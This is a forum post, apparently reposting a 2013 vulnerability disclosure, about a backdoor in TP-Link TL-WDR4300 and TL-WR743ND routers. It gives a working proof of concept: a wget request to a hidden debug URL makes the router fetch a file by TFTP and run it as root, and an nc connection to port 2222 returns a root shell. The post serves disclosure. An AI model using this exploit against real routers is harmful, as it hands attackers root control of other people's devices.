Jump to content
Fi8sVrs

TP-Link http/tftp backdoor

Recommended Posts

  • Active Members
Posted

About the TP-Link Router

TP-Link TL-WDR4300 is a popular dual band WiFi, SOHO class router.

tp-logo.jpg

Tested Firmware

We tested the remote root PoC on the newest firmware (published on 25.12.2012):

firmware_version.png

TL-WDR4300 – tested firmware version

The following info is provided for educational use only! We are also not resposible for any potential damages of the devices which are tested for this vulnerability.

Proof of Concept

root@secu:~# nc 192.168.0.1 2222
(UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused
root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html --2013-03-09 23:22:31-- http://192.168.0.1/userRpmNatDebugRpm26525557/start_art .html
Connecting to 192.168.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: "start_art.html"

[ <=> ] 426 --.-K/s in 0s

2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426]

root@secu:~# nc 192.168.0.1 2222
ps
PID Uid VmSize Stat Command
1 root 404 S init
2 root SW< [kthreadd]
3 root SW< [ksoftirqd/0]
4 root SW< [events/0]
5 root SW< [khelper]
6 root SW< [async/mgr]
7 root SW< [kblockd/0]
8 root SW [pdflush]
9 root SW [pdflush]
10 root SW< [kswapd0]
17 root SW< [mtdblockd]
18 root SW< [unlzma/0]
71 root 2768 S /usr/bin/httpd
76 root 380 S /sbin/getty ttyS0 115200
78 root 208 S ipcserver
82 root 2768 S /usr/bin/httpd
83 root 2768 S /usr/bin/httpd
86 root 732 S ushare -d -x -f /tmp/ushare.conf
92 root 348 S syslogd -C -l 7
96 root 292 S klogd
101 root SW< [napt_ct_scan]
246 root 348 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
247 root 204 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
251 root 364 S /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf
286 root 2768 S /usr/bin/httpd
299 root 2768 S /usr/bin/httpd
300 root 2768 S /usr/bin/httpd
305 root 2768 S /usr/bin/httpd
307 root 2768 S /usr/bin/httpd
309 root 2768 S /usr/bin/httpd
310 root 2768 S /usr/bin/httpd
389 root 2768 S /usr/bin/httpd

Details

After the following HTTP request is sent:

http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html

the router downloads a file (nart.out) from the host which has issed the http request and executes is as root:

tp-link-diag-400x214.png

PoC – diagram

Sample captures from the host which issues the http request:

wireshark_tmp-400x122.png

Wireshark filter used to show router tftp traffic

wireshark1-400x103.png

nart.out tftp request

Models affected

  • TL-WDR4300
  • TL-WR743ND (v1.2 v2.0)

History of the bug

12.02.2013 – TP-Link e-mailed with details – no response

22.02.2013 – TP-Link again e-mailed with details – no response

12.03.2013 – public disclosure

More information

More information about TP-Link backdoor

Source

TP-Link http/tftp backdoor

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...